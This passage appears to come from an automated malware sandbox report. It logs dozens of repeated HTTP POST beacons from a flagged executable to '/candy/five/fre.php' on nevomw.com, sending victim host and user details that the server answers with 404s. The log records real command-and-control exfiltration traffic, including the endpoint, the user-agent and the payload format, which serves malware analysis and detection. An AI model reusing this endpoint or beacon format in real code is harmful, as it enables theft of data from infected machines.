                                            Dec 2, 2020 11:53:31.927525997 CET | 1418 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:32.010010004 CET | 1418 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:31 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            106 | 192.168.2.6 | 49848 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:32.306005955 CET | 1419 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:32.358225107 CET | 1419 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:32.430725098 CET | 1419 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            107 | 192.168.2.6 | 49849 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:32.677638054 CET | 1420 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:32.732115984 CET | 1420 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:32.804538965 CET | 1421 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            108 | 192.168.2.6 | 49850 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:33.088546991 CET | 1422 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:33.142995119 CET | 1422 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:33.217117071 CET | 1422 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            109 | 192.168.2.6 | 49851 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:33.527612925 CET | 1424 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:33.580550909 CET | 1424 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:33.653285980 CET | 1425 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:33 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            11 | 192.168.2.6 | 49724 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:47.619406939 CET | 86 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:47.672055006 CET | 86 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:47.748179913 CET | 87 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            110 | 192.168.2.6 | 49853 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:33.937055111 CET | 1431 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:33.989012957 CET | 1434 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:34.063106060 CET | 1438 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            111 | 192.168.2.6 | 49854 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:34.366689920 CET | 1439 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:34.422066927 CET | 1439 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:34.511687994 CET | 1440 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            112 | 192.168.2.6 | 49855 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:34.808233976 CET | 1440 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:34.861234903 CET | 1441 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:34.935148001 CET | 1441 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            113 | 192.168.2.6 | 49856 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:35.232012987 CET | 1442 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:35.284406900 CET | 1442 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:35.356287003 CET | 1442 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:35 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            114 | 192.168.2.6 | 49857 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:35.626805067 CET | 1443 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:35.680749893 CET | 1444 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:35.766350031 CET | 1444 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:35 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            115 | 192.168.2.6 | 49858 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:36.022089958 CET | 1445 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:36.075316906 CET | 1445 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:36.150350094 CET | 1445 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            116 | 192.168.2.6 | 49859 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:36.435767889 CET | 1446 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:36.488735914 CET | 1447 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:36.561460018 CET | 1447 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            117 | 192.168.2.6 | 49860 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:36.878453016 CET | 1448 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:36.931330919 CET | 1448 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:37.006664038 CET | 1448 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            118 | 192.168.2.6 | 49861 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:37.316129923 CET | 1449 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:37.369921923 CET | 1449 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:37.454833031 CET | 1450 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            119 | 192.168.2.6 | 49862 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:37.757545948 CET | 1451 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:37.810399055 CET | 1451 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:37.885756016 CET | 1451 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            12 | 192.168.2.6 | 49725 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:48.049426079 CET | 87 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:48.111213923 CET | 88 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:48.184302092 CET | 88 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            120 | 192.168.2.6 | 49863 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:38.181313038 CET | 1452 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:38.234414101 CET | 1452 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:38.308756113 CET | 1453 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:38 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            121 | 192.168.2.6 | 49864 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:38.602222919 CET | 1455 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
